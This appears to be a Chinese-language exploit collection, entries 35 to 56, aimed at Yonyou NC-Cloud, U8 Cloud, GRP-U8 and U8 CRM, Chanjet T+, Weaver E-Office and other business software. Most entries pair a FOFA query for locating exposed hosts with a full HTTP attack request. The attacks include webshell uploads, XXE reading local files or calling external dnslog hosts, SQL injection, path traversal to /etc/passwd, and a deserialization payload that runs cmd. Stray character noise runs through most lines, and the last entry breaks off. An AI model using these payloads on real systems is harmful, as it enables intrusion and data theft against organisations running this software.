1 A2 W# }* [6 ~3 }1 W6 O* ]& e" g35. 用友NC-Cloud importhttpscer任意文件上传& M {, O4 d' \& x
FOFA:app="用友-NC-Cloud"2 T) ]2 n8 d- _1 L W2 F
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
' Q( `; |- s1 A( k SHost: 203.25.218.166:8888
- y& X h2 Z1 q$ L1 d& GUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info3 M+ ?0 l g% q' S" ]7 R
Accept-Encoding: gzip, deflate( T! l0 m1 A& ~/ z# D
Accept: */*. z8 `) X2 K+ R0 N$ L; ` _
Connection: close! R) L6 E, P+ Y$ a' M2 q
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
. y3 u2 m4 U3 E" k" gContent-Length: 1901 q, t. m5 h V( G4 O
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df03 c% U- M' T2 t1 h
5 x4 ~# o! H' v2 z" a--fd28cb44e829ed1c197ec3bc71748df0
( i! F# a! j" B5 C. ~3 O. eContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
: d0 _% _4 L) l* ~8 N: I- F# z& g, l% D- M( h
<%out.println(1111*1111);%>5 U4 U. |9 l- \: `! I* s8 @8 [
--fd28cb44e829ed1c197ec3bc71748df0--
1 u% z V# |; O1 ^; J- I1 r/ u6 b4 T. b' e# M. J+ T$ ?2 S! P
: q2 P! q) @3 i3 S6 H36. 用友NC-Cloud soapFormat XXE: p7 X! J; [1 q' D' W( |; ^3 U
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"2 @! K O. @) w. S, I
POST /uapws/soapFormat.ajax HTTP/1.1
# Y8 S7 b+ V8 E$ k* THost: 192.168.40.130:8989
( Z4 @4 Q, o, p" @+ J5 G) HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
4 n1 e/ w9 p4 l9 A3 Q6 uContent-Length: 263
2 @ ?' c, _; K. o \9 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: Y" X- D/ ?* ~- }! w/ _: F
Accept-Encoding: gzip, deflate
- o8 n- ]2 ~0 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ T9 P5 P/ A( w! s8 V0 |
Connection: close
2 E' ]0 u/ Y* u7 _Content-Type: application/x-www-form-urlencoded; d: u. S. g$ J7 a5 f7 n
Upgrade-Insecure-Requests: 1
+ e- |4 G5 H8 E' k' C4 V9 ?4 J* J$ G' p4 O
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
- q7 \- {' C' ^! t9 Y- R
) Y' Z2 V" O1 `3 h/ y1 v! F4 Q3 g' ], l
37. 用友NC-Cloud IUpdateService XXE! K* C7 b* I" p1 p$ ]
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" c, o5 o- e+ }. N! q. ^9 I. |POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
8 ? ]6 z- L" P8 |. UHost: 192.168.40.130:8989" E) p* |/ K4 P0 l# g1 D" r8 a6 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
, e0 v, X* y5 ]5 T0 M# I3 nContent-Length: 421
1 C$ J# ^, a& A! p4 h+ \- UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: h! _3 D7 b3 m0 g7 K! [
Accept-Encoding: gzip, deflate7 u" P- t# d" `: S1 ^% b2 P; X5 Z' ?
Accept-Language: zh-CN,zh;q=0.9
* L% l1 c4 J SConnection: close
" a' e' V& y- J$ LContent-Type: text/xml;charset=UTF-8
5 `3 o, B c# _; J# ~SOAPAction: urn:getResult
& E9 L H/ Y, L4 y2 [8 nUpgrade-Insecure-Requests: 1
9 r2 i; A b3 Y( a7 S6 F8 N& A; ~ C$ L3 f" ?/ D
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
5 e3 b, d' R3 N2 m5 T& w# g1 O/ _# d<soapenv:Header/>; \+ o0 ]. o" p6 S( F. z! [" N% T
<soapenv:Body>/ Q: G0 G& M9 X" [9 ^
<iup:getResult>
% y. R7 z0 G* V3 ^<!--type: string-->
2 F9 X, `1 b. e5 _. a<iup:string><![CDATA[
2 k# b& V7 r9 R; Z/ q( c7 I<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>. M. K& @& h( f0 f
<xxx/>]]></iup:string>( s; r0 w8 x X+ K, ~
</iup:getResult>& B; x3 a4 w# y- a# d
</soapenv:Body>
y9 r# J* |$ J4 [4 z- e+ V. S0 l</soapenv:Envelope>
( [, I6 }* z: g" k, s. `' e+ x
- z3 `; }. x9 d4 F% `7 L" V1 V$ i8 V) [7 f" h
( o3 r+ ?6 M, B# g9 Q% D4 }6 B
38. 用友U8 Cloud smartweb2.RPC.d XXE+ G0 _2 T: F% o% W
FOFA:app="用友-U8-Cloud": w0 \$ l8 X& x, n
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1/ l u$ t4 u3 v- K7 z6 f2 g K
Host: 192.168.40.131:80885 x9 W1 Q; J0 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
# c2 L) m1 O1 s; O" p; v* vContent-Length: 260
0 p, b8 D2 L& _& lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" P0 }- x! V0 |$ |
Accept-Encoding: gzip, deflate
1 B6 x0 @6 j, b5 K* _: B% P$ _+ @- {1 HAccept-Language: zh-CN,zh;q=0.9
8 ] D, l9 s. n( h) JConnection: close& o# b4 C! P/ }# |" g; d w
Content-Type: application/x-www-form-urlencoded
6 a8 c( T/ ~- \0 z% Z% N8 l, ]- f' X( @
7 B. N' Q$ D$ h4 a# ~* H8 o" p3 x" ^__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
6 a& \% U, {) B: s$ `" r7 C: V8 D( t. H4 }5 v; Y8 R7 {2 m6 b
* W$ ~: F) b$ @. w39. 用友U8 Cloud RegisterServlet SQL注入! ` F7 p# J. a E* }) V4 [: Z, K
FOFA:title="u8c"- q9 ^' `: {7 i3 h2 I
POST /servlet/RegisterServlet HTTP/1.1! ~* X* G- {! K
Host: 192.168.86.128:8089
6 z3 m$ R$ s$ k3 g, N8 u" kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# n# [6 {! Z: @$ K" _8 mConnection: close
# N: A/ }+ D7 ^ L- I. q3 r, @5 g7 UContent-Length: 852 @6 S; U; T6 w! ^+ x5 G: l
Accept: */*
* g8 \% ?2 ~) ZAccept-Language: en8 I$ _$ @6 b0 n, L' {1 L$ ^7 |
Content-Type: application/x-www-form-urlencoded
5 `: w$ ]. s! |: @X-Forwarded-For: 127.0.0.1
/ H7 ]& L9 n9 sAccept-Encoding: gzip5 }% t" F5 L' I6 f {( Y9 C2 ?- Y6 J
+ m3 T( w3 X; O, f1 a5 b% cusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--) {4 T0 G7 ~; v2 u) S* z% J" s$ n; v
( D! `0 t+ p+ X8 m9 S2 g @2 t5 {
* Y8 ^" }& {: A' d/ J& A
40. 用友U8-Cloud XChangeServlet XXE
9 W y% f0 m# \FOFA:app="用友-U8-Cloud"
0 [* [9 S& e& s4 w& |POST /service/XChangeServlet HTTP/1.1
" E( Z5 e: q8 ?. }Host: x.x.x.x
2 E; I z; l6 O2 N& N8 L" Y7 bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& y8 R8 E, ~- s2 i+ e5 @Content-Type: text/xml
( p+ G: a2 b1 g. c) y+ F3 eConnection: close. K0 B9 L, x& e, r2 j/ _, X0 i
( K. t' F+ Y9 \2 f: J<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>, n- ], `5 E1 m" |4 p
' z/ z8 |9 j, S) P
! x0 g# s3 {: T$ m4 t- m41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. H+ Z' g! ~) A G3 rFOFA:app="用友-U8-Cloud" x& ^' j1 k# Y) }+ J% |
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
/ o2 ?' U- @5 G; r4 EHost:
- I$ {% o9 b* i4 n& i8 l7 x* _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 B9 E: n# o, F5 }. u0 A
Content-Type: application/json3 u) H* F* c* X5 S+ e0 p* y
Accept-Encoding: gzip
( z! z3 X* e2 ?- iConnection: close4 N$ X/ B# h( t# ~! \) g6 K
+ o/ ~3 u. v5 n. t% _4 L9 l( M w. H
42. 用友GRP-U8 SmartUpload01 文件上传
+ X* v! Q% M+ |( y* n8 cFOFA:app="用友-GRP-U8"* Q/ H% [. ?' s
POST /u8qx/SmartUpload01.jsp HTTP/1.1/ B3 }. V+ g% L7 T
Host: x.x.x.x
- A1 ~" j( M* {! r5 T" W: sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt- t7 g l: R: P, b' l/ |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36' y; f `; a" X9 n
/ P8 s, M- N. F+ ~
PAYLOAD
" J5 R# d; p) g* S& B8 w% y# e" K/ u/ M/ q5 O0 J/ C
* Y0 \" Z; s3 _; y5 L/ M0 ~2 zhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml8 R+ [1 Y1 S `6 G
$ s4 B8 n% g; a" I+ b; e
43. 用友GRP-U8 userInfoWeb SQL注入致RCE. E* I) y8 \2 p% \5 f8 @. Z4 D4 O5 p
FOFA:app="用友-GRP-U8"# j- U, x- b9 G. [7 P/ g
POST /services/userInfoWeb HTTP/1.1/ D) ^# V: o- V; a
Host: your-ip( K4 I( g1 @5 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# O% _+ y, m2 C! D& FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ X) ~2 V( `# e7 ~
Accept-Encoding: gzip, deflate
1 N6 T# C. l1 ~. q$ _0 i. f* VAccept-Language: zh-CN,zh;q=0.9
0 {5 }: m8 O8 r+ e! \8 tConnection: close# p4 C% N3 v/ K4 [) e, ?. A
SOAPAction:# n4 u: Q8 W$ j7 p3 M! O
Content-Type: text/xml;charset=UTF-8. Q! H' b! a* M" d4 O" w4 u( n i
6 b" S$ ?! p. N: J# h
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">0 ]: Y+ E; y7 t5 c
<soapenv:Header/>
* K2 V+ b+ a. j" K: w <soapenv:Body>& Y0 H. {6 b3 }$ }% H, [7 n
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">8 D, d5 i( h' O2 S2 R* Q7 Q+ i
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>$ J" ^7 W& ]! N* d
</ser:getUserNameById>
h8 T3 E/ q- X4 ?, S </soapenv:Body>. U; E% ^1 C+ F3 j$ \
</soapenv:Envelope>
5 c6 g+ u% j2 F' I% B6 R& Q+ L5 z
( u6 D% `- ~* y* P$ @; R+ _" }% y1 x+ x7 s; A
44. 用友GRP-U8 bx_dj_check.jsp SQL注入1 S) v( h3 q2 g0 g: k. N- p
FOFA:app="用友-GRP-U8"# Z1 H" f. G- B, ~6 p
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1" {! U) Z" T! p4 \
Host: your-ip
* A5 I( K5 i) m% z! WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
& A; W/ u- U1 H* Y, T" i1 C3 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ r d' L5 d$ h- ]2 f. n! yAccept-Encoding: gzip, deflate
& d% L! z! n2 W# d: C; H+ f3 L1 kAccept-Language: zh-CN,zh;q=0.9
3 W7 m( I* I( |! A5 IConnection: close8 |/ X4 d3 {7 r- a( Q
& T$ R/ H" S) U: Q8 F, _; t$ S! Q2 O% ?, Y1 |+ W- \
45. 用友GRP-U8 ufgovbank XXE
5 M' A: ]: Q5 ^. q: U4 QFOFA:app="用友-GRP-U8"
- i7 d3 A/ } S' y) K5 e8 _) OPOST /ufgovbank HTTP/1.19 Z$ {7 ~+ {; x2 B
Host: 192.168.40.130:222
2 i; y* a+ R! ^4 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.06 ^$ z3 b; R* Q& K
Connection: close
# `* F% C) ?/ \% @4 Y4 AContent-Length: 161
) k# T9 F* @# t! s" _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 x) H6 S4 o, D+ Z+ v, t8 c( _% I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 ?' l; O, T# {
Content-Type: application/x-www-form-urlencoded9 \. }* b% P! l! E/ V
Accept-Encoding: gzip. A& ^3 N4 }* b+ j
! y* U4 \4 M, Z7 c: L2 M7 M6 L) E
reqData=<?xml version="1.0"?>
+ ~- f8 T2 D+ t. X% J<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest, i7 A" m, |" _7 z3 m1 X' h
+ w; b. w/ Z g; s' x
# B3 \4 S7 z0 T3 g8 O5 o! l$ Q! h46. 用友GRP-U8 sqcxIndex.jsp SQL注入- f6 X- `* x B; l
FOFA:app="用友-GRP-U8"0 s7 p% g% U( Y0 a
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
" N9 c4 B5 w5 R3 I; }5 iHost: your-ip: r0 L9 I) l3 n0 U. ^7 A0 `' y6 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
5 @* R$ k w. X( a3 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 p& c2 O) s) k* }3 p' s2 i1 D
Accept-Encoding: gzip, deflate. \ |, ~0 t( y& P
Accept-Language: zh-CN,zh;q=0.9
3 ^! v& F. f+ s2 fConnection: close
9 e9 X- @/ I$ w* @. j9 O# {) ]
% s) S# g4 ^8 V! u+ t( l- t! H
" K# b: f) h' W/ j d+ `47. 用友GRP A++Cloud 政府财务云 任意文件读取
( D; W9 T' T7 N# [6 ?5 I( GFOFA:body="/pf/portal/login/css/fonts/style.css"* j# Z& i* Q, j5 y8 M8 z
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1! _+ H8 ]0 f0 e- l
Host: x.x.x.x& @9 ~! {! k9 m
Cache-Control: max-age=0
/ _% c7 p( k! }Upgrade-Insecure-Requests: 1" z; t+ X; r8 m6 t( }1 @, h- a) x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 `) ]' S% o$ N; C! _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% j- s! w6 s" X+ Z) j
Accept-Encoding: gzip, deflate, br) h: n8 v0 G$ F; b8 z
Accept-Language: zh-CN,zh;q=0.9
, n' H) z+ H* D2 X$ fIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
: P$ U; `' ~6 b3 T0 J: d IConnection: close
5 b" s( ]% w$ D* q3 J, w
6 z( Q$ {% X% s7 {" H1 P7 m$ ?( E# u: S
5 ^1 I/ {6 B1 t1 o7 O48. 用友U8 CRM swfupload 任意文件上传: {7 ?9 ~" l. n/ \4 i& Y. }) [( K& w8 P# J
FOFA:title="用友U8CRM" X. {% g0 O/ \" q
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1! E/ P: M5 d3 w" M1 M9 P+ w+ o# u' M
Host: your-ip
6 h% d: b0 I ^, qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 d6 K& I7 l% c8 @6 `, gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
w( L1 r# t$ [: bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ `+ X; F$ R% Z, H- L7 zAccept-Encoding: gzip, deflate
2 \% q( h8 n4 Q8 F4 _6 \! sContent-Type: multipart/form-data;boundary=----269520967239406871642430066855! e' \ y3 Z h! W
------269520967239406871642430066855
6 Y1 w9 \7 j5 D; P/ R1 X+ JContent-Disposition: form-data; name="file"; filename="s.php"1 H* ^+ I9 R/ X# P! z
1231
' Q1 i! B: n( h3 ~8 d" HContent-Type: application/octet-stream
6 i7 W# M! R l% f; A' H. s/ D! j1 Z------269520967239406871642430066855
& o- R& e0 l0 f2 p" {. S5 HContent-Disposition: form-data; name="upload"
' a, ]7 j. F& M0 f* wupload3 D) Z9 S- k( T4 r- }2 l
------269520967239406871642430066855--
& e4 }! { c$ K8 p: L
0 c( [) }. `* Y; Z! M4 t; e8 t$ Y2 @" c1 c
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
$ ~& O: i3 {+ B2 R( m3 wFOFA:body="用友U8CRM"
4 g: J7 Q: i: e; z: E' l- z* L4 e$ l% s7 o
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
' o/ L* E' v) n. C; o. F4 WHost: x.x.x.x
- f! J, w9 b: ~2 V8 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( @% P; ]4 w" \( A
Content-Length: 329
( B( N2 i. h7 r7 d) ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 K7 d$ g9 [ v; b+ o
Accept-Encoding: gzip, deflate' y* t8 }6 u% @# L4 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 L I! Q( _; u1 z& MConnection: close
4 }+ f; X, L) P- e- q) s4 Y: oContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w3 Y4 B3 b: P& P
! I) X6 [9 g/ J1 b/ l2 J
-----------------------------vvv3wdayqv3yppdxvn3w* W0 s8 J6 {1 y. m
Content-Disposition: form-data; name="file"; filename="%s.php "
- I. b8 I7 Y9 ^$ n: b+ Q% UContent-Type: application/octet-stream6 U. |' [- g( D) w8 `6 m- G$ M) q( w
8 o% Y9 m' G4 awersqqmlumloqa
+ v# @3 q: {8 ?# Z8 \-----------------------------vvv3wdayqv3yppdxvn3w, Y4 e$ |/ l, e& |5 o" w' l% l5 U
Content-Disposition: form-data; name="upload"
" O5 b3 L0 @1 a* g* I) W6 a- s3 k1 U2 q6 K
upload! F0 m7 F* x( K& o1 B) T& g/ p4 A
-----------------------------vvv3wdayqv3yppdxvn3w--# B$ s3 @ ?: [
5 r/ q% C9 {- x( H9 N0 M! @: e6 J
http://x.x.x.x/tmpfile/updB3CB.tmp.php) [. K- U2 b& R4 }; b4 h
I; N7 v) a/ U5 f+ V50. QDocs Smart School 6.4.1 filterRecords SQL注入
6 D0 a9 K1 w) T; g6 p4 iFOFA:body="close closebtnmodal". m' [3 L2 ?8 z! g( m5 S: n
POST /course/filterRecords/ HTTP/1.1$ U- }4 M; U3 q2 f2 m& R. R, w
Host: x.x.x.x
+ @9 i3 c" U" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' v1 G$ c# ]0 u# UConnection: close- q. t, p+ i9 @! r
Content-Length: 224" ?/ C5 ]% G' v" `; ~
Accept: */*7 Z) B4 l8 N" Z0 k( b, ]
Accept-Language: en; }7 h# y V0 L+ d: W/ Q
Content-Type: application/x-www-form-urlencoded
2 ~( \$ N- f }+ v2 tAccept-Encoding: gzip A' Z) D$ s# q8 M
/ L6 `/ v k _. a9 gsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1* B2 H% E2 [' A" `( J
6 Q0 V) c/ Y) R5 q; j. v+ i C7 ^8 r
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 l' q* H7 X% e8 d
FOFA:app="云时空社会化商业ERP系统"! O6 `8 L* ^! I
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1/ B9 m7 l; D& h6 x2 r
Host: your-ip
: o) {9 _* {4 x4 I1 Q BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" ^* K! v p* }# T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; d: S6 X! [; v9 G
Accept-Encoding: gzip, deflate
9 K8 w1 a# o+ ]" L5 {Accept-Language: zh-CN,zh;q=0.92 w2 I1 l8 k2 x2 H7 _; E
Connection: close
4 q! N$ m2 J1 i# c* Z* u1 }
! Q" R/ E/ c8 z4 x# y. m1 C$ r; p8 |6 Q. Y
52. 泛微E-Office json_common.php sql注入 Q1 a: @, ]8 ?
FOFA:app="泛微-EOffice"
" N% Y/ x+ I) t; o) nPOST /building/json_common.php HTTP/1.1
. M [$ G0 f/ m7 hHost: 192.168.86.128:8097( D5 ^( O B; P/ i
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ Q1 A" f+ W6 R3 D& t+ {
Connection: close
, k* s0 @" |7 g+ Y; `& o% qContent-Length: 87
, t" Z+ E# I1 _8 yAccept: */*
8 }5 ~# }/ z/ F- ` w* vAccept-Language: en
4 p% h/ _$ N9 b; w ~Content-Type: application/x-www-form-urlencoded+ B- f0 m- v* \0 s4 f; H
Accept-Encoding: gzip9 {- Q7 I9 n; r( U
4 o- l$ l5 ]- ^1 k; c# A+ d, _" o* L
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
. Y) t8 h- I6 t6 \: m
9 [6 r3 Y5 P: y g6 S7 a
4 {. A2 M# m( B4 _1 A6 v53. 迪普 DPTech VPN Service 任意文件上传1 q3 g. Z+ G/ J: S3 l
FOFA:app="DPtech-SSLVPN"
3 p0 s% A6 r* l/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd% o/ u9 |4 c2 j3 x/ E" Z
& O! w2 t" C8 i; F5 U
' m! z, \- n- P4 |54. 畅捷通T+ getstorewarehousebystore 远程代码执行 \+ O/ j Q, c
FOFA:app="畅捷通-TPlus"5 z% G! M$ _# v! j8 _5 u7 k5 w0 Q
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
( |* ^1 t: G9 B6 n7 _) b4 g" L"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( Q P% t6 h; y; ]6 v: S! M2 Y6 J5 T6 w
; v {( }* s& F6 A3 i7 Z
& [( n! s. M' S h7 n" Z( ~完整数据包
3 z$ n; B0 B% T3 M2 MPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1* ?$ v \2 b. C F1 b0 f( R
Host: x.x.x.x
+ q4 h1 G% d7 n& zUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
$ _: `" y7 G- X) hContent-Length: 593
, h3 w+ w }. a3 L) B
) I' I* m% }' X- n) o$ {{! x% K2 X" c" p5 T, x( i0 T
"storeID":{
2 k9 E2 @1 r1 Z( J "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' S( J* K) Q/ j "MethodName":"Start",
+ j( A5 A z0 L& Q2 z* B' q- { "ObjectInstance":{9 S1 n4 C! t! V/ w, z2 G3 p
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," P) g5 e I" @: {
"StartInfo":{
7 G4 Q6 i$ @( Y1 k5 J "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 i+ n* h* p% w6 g "FileName":"cmd",
3 t2 l( `! r$ H: F' C$ { "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. K L7 O0 [, J. z! ? }
4 d( j: Q0 @ @% v9 { }
7 ^' ~3 K" F' z% F+ K% N, F }
9 e& i; F" d7 O6 a5 Y% T) r0 @}$ L4 ?5 \3 ]; b; d5 W4 b6 P
4 {9 w" m0 ^! P: G# C+ i: j
7 Y$ e# x8 S+ Q0 v) T- h; r* {
第二步,访问如下url( _9 Q' P) T, E1 ]2 g5 \0 y
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
1 ~' {# x9 u Y1 D' c2 A( Q+ W' L; F3 e1 P# ^; g: K
6 F4 i% h9 m4 u
55. 畅捷通T+ getdecallusers信息泄露
+ [) [1 d d9 N. d& eFOFA:app="畅捷通-TPlus"
F3 @( a0 M2 H4 c$ D3 F; L* [第一步,通过
( t$ }0 v8 R" H2 b* s9 U) ~/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie3 f* U' A5 I" o1 ?, `' |
第二步,利用获取到的Cookie请求/ q, M4 G; _% g# r5 I- N+ [( N1 h
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
g! V( {0 j5 U3 i1 W
; l4 \! [7 t5 j" J% W/ X& W! z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" W6 r5 }5 ` O0 c' R& DFOFA: app="畅捷通-TPlus"7 D% i" t {' r/ z( C( d2 l
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
, u/ w1 G, Y) AHost: x.x.x.x
